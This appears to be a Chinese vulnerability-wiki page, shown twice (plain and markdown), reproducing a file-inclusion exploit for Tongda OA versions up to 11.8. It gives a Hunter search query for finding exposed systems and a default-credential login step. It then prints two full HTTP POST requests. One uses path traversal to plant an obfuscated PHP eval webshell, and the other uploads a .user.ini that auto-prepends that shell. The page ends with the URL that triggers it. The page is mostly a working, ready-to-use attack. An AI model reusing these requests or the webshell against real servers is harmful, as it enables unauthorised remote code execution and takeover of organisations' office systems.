fofamini-wiki

登录白背景

源码

通达OA update存在后台文件包含漏洞

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA v11.8及以下存在文件上传接口，可上传 .user.ini 文件包含有PHP语句的文件导致命令执行。

二、影响版本

通达2017-通达V11.8

三、资产测绘

hunterapp.name="通达 OA"

登录页面

四、漏洞复现

使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；

通过上一步获取的cookie到日志文件tongda.log

POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/tongda HTTP/1.1
Cookie: PHPSESSID=v5pjfe3ign7ge166a6383hnu01; path=/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Host: 
Content-Length: 471

-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="tongda.log"
Content-Type: text/plain


<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['x']);?>
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"

保存
-----------------------------17518323986548992951984057104--

替换cookie，上传.user.ini文件包含tongda.log文件

POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user HTTP/1.1
Cookie: PHPSESSID=v5pjfe3ign7ge166a6383hnu01; path=/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Host: 
Content-Length: 369

-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="config.ini"
Content-Type: text/plain

auto_prepend_file=tongda.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"

保存
-----------------------------17518323986548992951984057104--

文件包含getshell

http://ip/general/reportshop/workshop/report/attachment-remark/form.inc.php

原文: https://www.yuque.com/xiaokp7/ocvun2/mk16nkl6nea6imgq

# 通达OA update存在后台文件包含漏洞

# 一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA v11.8及以下存在文件上传接口，可上传 .user.ini 文件包含有PHP语句的文件导致命令执行。

# 二、影响版本

- 通达2017-通达V11.8

# 三、资产测绘

- hunter`app.name="通达 OA"`

![image.png](./img/FDX14CajCOVxk2lx/1692175272185-2e2eccad-00b6-4598-a978-54d5b591d45a-492047.png)

- 登录页面

![image.png](./img/FDX14CajCOVxk2lx/1692175288340-990aa042-3b09-4cd8-8ae2-c55104f1b974-594577.png)

# 四、漏洞复现

1. 使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；

![image.png](./img/FDX14CajCOVxk2lx/1683387160692-68b96b0e-ece1-4182-9c8c-3547689af283-446733.png)

2. 通过上一步获取的cookie到日志文件`tongda.log`
```java
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/tongda HTTP/1.1
Cookie: PHPSESSID=v5pjfe3ign7ge166a6383hnu01; path=/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Host: 
Content-Length: 471

-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="tongda.log"
Content-Type: text/plain

<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['x']);?>
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"

保存
-----------------------------17518323986548992951984057104--
```
![image.png](./img/FDX14CajCOVxk2lx/1691049827706-9a879f62-6efd-41d7-8741-1ceae31f5941-249877.png)

3. 替换cookie，上传`.user.ini`文件包含`tongda.log`文件
```java
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user HTTP/1.1
Cookie: PHPSESSID=v5pjfe3ign7ge166a6383hnu01; path=/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Host: 
Content-Length: 369

-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="config.ini"
Content-Type: text/plain

auto_prepend_file=tongda.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"

保存
-----------------------------17518323986548992951984057104--

```
![image.png](./img/FDX14CajCOVxk2lx/1691049840016-f1cbaebd-c664-4d05-a591-12dd0a50c19c-819157.png)

4. 文件包含getshell
```java
http://ip/general/reportshop/workshop/report/attachment-remark/form.inc.php
```
![image.png](./img/FDX14CajCOVxk2lx/1691049944228-0a8a29df-bb86-4807-bf2d-3a95be1ec5e7-622428.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mk16nkl6nea6imgq>